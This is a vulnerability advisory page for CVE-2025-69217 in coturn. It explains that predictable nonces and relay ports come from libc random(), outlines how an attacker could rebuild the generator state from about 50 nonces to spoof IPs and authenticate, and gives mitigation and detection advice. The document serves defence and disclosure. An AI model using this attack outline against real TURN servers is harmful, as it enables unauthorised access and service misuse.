CVE-2025-69217
Predictable Nonces and Ports in coturn Enable Authentication Bypass
Publication date: 2025-12-30
Last updated on: 2025-12-30
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| coturn | coturn | 4.6.2r5 |
| coturn | coturn | 4.7.0-r4 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-338 | The product uses a Pseudo-Random Number Generator (PRNG) in a security context, but the PRNG's algorithm is not cryptographically strong. |
Attack-Flow Graph
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The provided resources do not contain information regarding the impact of this vulnerability on compliance with common standards and regulations such as GDPR or HIPAA.
Can you explain this vulnerability to me?
This vulnerability affects coturn versions 4.6.2r5 through 4.7.0-r4, where the random number generator used for nonces and port randomization is weak. Instead of using OpenSSL's secure RAND_bytes, it uses libc's random(), which can be predicted. By observing about 50 sequential nonces through unauthenticated allocation requests, an attacker can reconstruct the random number generator's state and predict future nonces. This allows the attacker to authenticate while spoofing IP addresses and send authenticated messages without receiving responses. Additionally, port randomization is deterministic and can be predicted, enabling attackers to know current and future relay ports.
How can this vulnerability impact me? :
The vulnerability allows attackers to predict authentication nonces and relay ports, enabling them to spoof IP addresses and send authenticated messages without proper responses. This can lead to unauthorized access or misuse of the TURN/STUN server, potentially disrupting services or allowing attackers to bypass security controls that rely on nonce unpredictability and port randomization.
What immediate steps should I take to mitigate this vulnerability?
Update coturn to a version that includes the fix for this vulnerability, specifically a version that contains commit 11fc465f4bba70bb0ad8aae17d6c4a63a29917d9 or later.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for predictable or sequential nonce values and relay port allocations in coturn server traffic. Since the weakness allows an attacker to reconstruct the random number generator state by capturing about 50 sequential nonces through unauthenticated allocation requests, you can attempt to send multiple unauthenticated allocation requests to the coturn server and analyze the returned nonces for predictability or patterns. Commands to perform this detection might involve using STUN/TURN client tools or custom scripts to send multiple allocation requests and capture nonce values. For example, using a TURN client or tools like 'turnutils_uclient' (part of coturn) to send repeated allocation requests and log the nonces. Then, analyze the sequence of nonces for predictability or linearity, which indicates the vulnerability. Additionally, monitoring relay port assignments for predictable increments or patterns can help detect the vulnerability. However, no specific detection commands are provided in the resources. [2]